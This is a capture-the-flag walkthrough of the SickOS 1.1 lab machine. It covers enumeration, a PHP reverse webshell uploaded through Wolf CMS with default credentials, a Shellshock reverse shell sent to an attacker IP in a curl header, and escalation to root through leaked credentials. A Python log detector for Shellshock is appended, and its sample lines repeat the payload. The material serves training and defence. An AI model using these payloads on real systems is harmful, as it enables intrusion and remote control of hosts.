SICKOS 1.1
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to walk through the hacking process for the vulnerable machine SickOS 1.1.
- SickOS 1.1 can be downloaded from here:
https://www.vulnhub.com/entry/sickos-11,132/
- Once downloaded and opened with VMware:
2 - ENUMERATION
- Using netdiscover we notice that the only IP address in the local VMware network is 192.168.1.15, so it should correspond to the vulnerable machine SickOS 1.1:
- Scanning with Nmap there are 2 ports open: 22 (ssh) and 3128 (Squid http-proxy):
- Configuring the Firefox Connection Settings for the discovered HTTP proxy (192.168.1.15:3128)
- Connecting with the browser:
- Viewing the source there is nothing interesting:
- Let's explore the website structure with dirb:
- Looking at the robots.txt file:
- Exploring the folder /wolfcms:
- Using dirb against wolfcms:
- Looking inside the public folder:
- Using nikto to discover potential vulnerabilities:
- The most remarkable result is that /cgi-bin/status is vulnerable to Shellshock:
3 - EXPLOITATION
- Let's try two ways to exploit the vulnerable machine.
3.1 - Uploading a webshell
- Googling for Wolf CMS vulnerabilities:
- Going back to /wolfcms we learn that there is an Administrator:
- Reading from the previous description of the vulnerability:
- Let's explore the admin option:
- Trying admin:admin, the authentication works:
- Going to the Files tab there is an Upload File function:
- At this point, why not upload a webshell?
- Kali Linux has got some webshells available:
- For instance, let's explore php-reverse-shell.php.
- Opening the file we see that there are two parameters that must be changed or adapted to our needs (IP and port to connect back to):
- Copying the webshell to a working folder so that we can manipulate it without losing the original version:
- Opening the webshell and modifying IP and port:
- Now it is ready to be uploaded to the vulnerable machine:
- We find php-reverse-shell.php at the /public folder:
- Before running it, let's establish a netcat listening session on port 3333:
- Running the webshell:
- The attack is successful, and a limited shell is achieved at the attacker's side:
3.2 - Shellshock
- Now, let's try to exploit the site by taking advantage of the Shellshock vulnerability:
https://metalkey.github.io/shellshock-explained--exploitation-tutorial.html
https://blog.cloudflare.com/inside-shellshock/
- We can check that the CGI script is run by bash, because requesting the path returns the output of uptime/uname inside a JSON string:
- Setting up a netcat listening session on port 4444:
- Let's craft a command curl to achieve a reverse shell:
https://curl.haxx.se/docs/manpage.html
https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/
- The parameters used in this case:
- -x (proxy) = 192.168.1.15:3128
- -H (header) = User-Agent ignored; /bin/bash -i>& /dev/tcp/192.168.1.17/4444 0>&1
- target = http://192.168.1.15/cgi-bin/status
- A limited shell is achieved at the attacker's side:
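The Shellshock request above leaves a recognisable trace on the target: the bash function-definition prefix arrives inside an HTTP header and is recorded in the web server's access log. The following detector is an added example, not part of the original write-up; it parses Apache "combined" log lines (constructed sample lines, not real logs from the machine) and flags entries whose User-Agent or Referer carries that prefix, ranking hits against /cgi-bin/ highest because that is where the header reaches bash.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" log format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock signature: a bash function definition "() {" smuggled into a header value,
# which a vulnerable bash evaluates when the CGI handler exports that header as an env var.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> Optional[str]:
    """Return a verdict for one parsed entry, or None if it looks clean."""
    if not any(SHELLSHOCK_RE.search(entry[f]) for f in ("agent", "referer")):
        return None
    # Hits against a CGI path are the ones that can actually execute; anything else is a probe.
    return "shellshock-attempt-cgi" if entry["path"].startswith("/cgi-bin/") else "shellshock-probe"


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run the detector over raw log lines and collect the suspicious ones."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict:
            findings.append({"client": entry["client"], "path": entry["path"], "verdict": verdict})
    return findings


# Constructed sample lines. Note: when traffic arrives through the Squid proxy on 3128, the
# client address Apache logs is the proxy's, so correlate with the Squid access log as well.
SAMPLE_LOG = [
    '192.168.1.17 - - [10/Nov/2016:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 93 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/45.0"',
    '192.168.1.17 - - [10/Nov/2016:10:00:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :; }; /bin/bash -i >& /dev/tcp/192.168.1.17/4444 0>&1"',
    '192.168.1.17 - - [10/Nov/2016:10:00:09 +0000] "GET /wolfcms/ HTTP/1.1" 200 4120 "-" "() { :;}; echo vulnerable"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On the defensive side, the real fix is patching bash (CVE-2014-6271 and its follow-ups) and not exposing /cgi-bin/ scripts through an open Squid proxy; the log check above only tells you whether someone has already tried.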
4 - PRIVILEGE ESCALATION
- Listing the folder /var/www:
- Listing wolfcms:
- Opening config.php we find interesting credentials for the user root:
- Trying to use the root credentials to achieve a shell, we find that the current shell does not allow the sudo command to be used:
- Upgrading to a tty so that we can run a /bin/bash shell:
- Trying again, su works but the authentication fails:
- Remembering the current user:
- Let's move to another user, for instance sickos:
- Now the authentication is correct:
- Finally a root shell is achieved:
- Also, we could reach the same point by SSH-ing in with the sickos user account:
- Surprisingly, sickos has full sudo rights:
- Also:
5 - CAPTURING THE FLAG
- Reading the flag:
- By the way, the flag's name is an MD5 hash:
- Cracking it reveals the original string: bleh!!